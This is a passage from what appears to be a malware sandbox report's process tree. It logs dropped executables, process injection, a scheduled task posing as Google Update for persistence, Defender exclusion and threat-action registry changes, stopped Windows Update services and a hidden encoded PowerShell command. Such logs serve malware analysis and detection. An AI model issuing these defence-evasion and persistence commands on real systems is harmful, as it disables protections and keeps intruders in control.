        
        C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\Yx0kI0az.exe
        6⤵
        
        PID:7716
        
        C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\1xx26nb2.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\1xx26nb2.exe
        7⤵
        
        PID:6164
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\2VC364RI.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\2VC364RI.exe
        7⤵
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:4264
- C:\Users\Admin\AppData\Local\Temp\1D2.exe
  C:\Users\Admin\AppData\Local\Temp\1D2.exe
  2⤵
  PID:1552
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\tlxvacrdjkek.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A3F.bat" "
  2⤵
  PID:6084
- - C:\Windows\SysWOW64\raserver.exe
    "C:\Windows\SysWOW64\raserver.exe"
    3⤵
    PID:4348
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:9240
- C:\Users\Admin\AppData\Local\Temp\23D3.exe
  C:\Users\Admin\AppData\Local\Temp\23D3.exe
  2⤵
  PID:5900
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4204
- C:\Users\Admin\AppData\Local\Temp\29FE.exe
  C:\Users\Admin\AppData\Local\Temp\29FE.exe
  2⤵
  PID:6720
- C:\Users\Admin\AppData\Local\Temp\33F2.exe
  C:\Users\Admin\AppData\Local\Temp\33F2.exe
  2⤵
  PID:7804
- C:\Users\Admin\AppData\Local\Temp\3CBD.exe
  C:\Users\Admin\AppData\Local\Temp\3CBD.exe
  2⤵
  PID:2200
- C:\Users\Admin\AppData\Local\Temp\9E57.exe
  C:\Users\Admin\AppData\Local\Temp\9E57.exe
  2⤵
  PID:5720
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:7792
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:5820
- C:\Users\Admin\AppData\Local\Temp\A0A9.exe
  C:\Users\Admin\AppData\Local\Temp\A0A9.exe
  2⤵
  PID:6872
- C:\Users\Admin\AppData\Local\Temp\A6E4.exe
  C:\Users\Admin\AppData\Local\Temp\A6E4.exe
  2⤵
  PID:5680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5224
- C:\Users\Admin\AppData\Local\Temp\BFCC.exe
  C:\Users\Admin\AppData\Local\Temp\BFCC.exe
  2⤵
  PID:3084
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5928
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5540
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:8088
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2492
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5796
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:7324
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:8092
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\tlxvacrdjkek.xml"
  2⤵
  - Creates scheduled task(s)
  PID:4292
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:7380
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4100
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:6036
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5320
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:6660
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:3392
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:7756
- - C:\Program Files (x86)\Q8p88zt\lxsr28.exe
    "C:\Program Files (x86)\Q8p88zt\lxsr28.exe"
    3⤵
    PID:6960
  - - C:\Program Files (x86)\Q8p88zt\lxsr28.exe
      "C:\Program Files (x86)\Q8p88zt\lxsr28.exe"
      4⤵
      PID:2228
- - C:\Windows\SysWOW64\colorcpl.exe
    "C:\Windows\SysWOW64\colorcpl.exe"
    3⤵
    PID:8060
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:4388
- - C:\Windows\SysWOW64\control.exe
    "C:\Windows\SysWOW64\control.exe"
    3⤵
    PID:8072
- C:\Users\Admin\AppData\Local\Temp\A20.exe
  C:\Users\Admin\AppData\Local\Temp\A20.exe
  2⤵
  PID:7380
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  PID:5188
- C:\Windows\SysWOW64\autochk.exe
  "C:\Windows\SysWOW64\autochk.exe"
  2⤵
  PID:7272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:3784
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:3408
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5784
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7560
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:8980
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:8656
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5440
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:8840
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6184
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:8248
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5916
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:7804
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5728
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\tlxvacrdjkek.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:7536
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:8420
- C:\Program Files (x86)\Q8p88zt\lxsr28.exe
  "C:\Program Files (x86)\Q8p88zt\lxsr28.exe"
  2⤵
  PID:8556
- - C:\Program Files (x86)\Q8p88zt\lxsr28.exe
    "C:\Program Files (x86)\Q8p88zt\lxsr28.exe"
    3⤵
    PID:2960
- - C:\Program Files (x86)\Q8p88zt\lxsr28.exe
    "C:\Program Files (x86)\Q8p88zt\lxsr28.exe"
    3⤵
    PID:5760
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\ogowniqawkxy.xml"
  2⤵
  - Creates scheduled task(s)
  PID:1064
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:9384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:6004
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:10204
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:10108
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:9832
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4212
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:8596
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:9148
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:10016
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:6596
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:6728
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:6736
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4212
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\tlxvacrdjkek.xml"
  2⤵
  - Creates scheduled task(s)
  PID:9544
- C:\Program Files (x86)\Kdxtpddg8\zjopj7nnhhvex.exe
  "C:\Program Files (x86)\Kdxtpddg8\zjopj7nnhhvex.exe"
  2⤵
  PID:9280
- - C:\Program Files (x86)\Kdxtpddg8\zjopj7nnhhvex.exe
    "C:\Program Files (x86)\Kdxtpddg8\zjopj7nnhhvex.exe"
    3⤵
    PID:5344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:10684
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:4000

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jG8tZ4jx.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jG8tZ4jx.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1352
- C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Yx0kI0az.exe
  C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Yx0kI0az.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2360

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1xx26nb2.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1xx26nb2.exe
1⤵
PID:3768
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:1584
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:3676
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 568
    3⤵
    - Program crash
    PID:2024
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:1932
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:1156

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4604

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2VC364RI.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2VC364RI.exe
1⤵
- Executes dropped EXE
PID:3448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1084

C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\BqqakwotwtgRPyW\YESqRnE.exe
C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\BqqakwotwtgRPyW\YESqRnE.exe 3C /Bvsite_idltI 525403 /S
1⤵
PID:2520
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5972
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7608
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:8028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8024
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ENXTzHitnHcZC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ENXTzHitnHcZC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpBrNwvlU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpBrNwvlU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QsvZUvXLjTYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QsvZUvXLjTYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wyDIDuFJfRUn\" 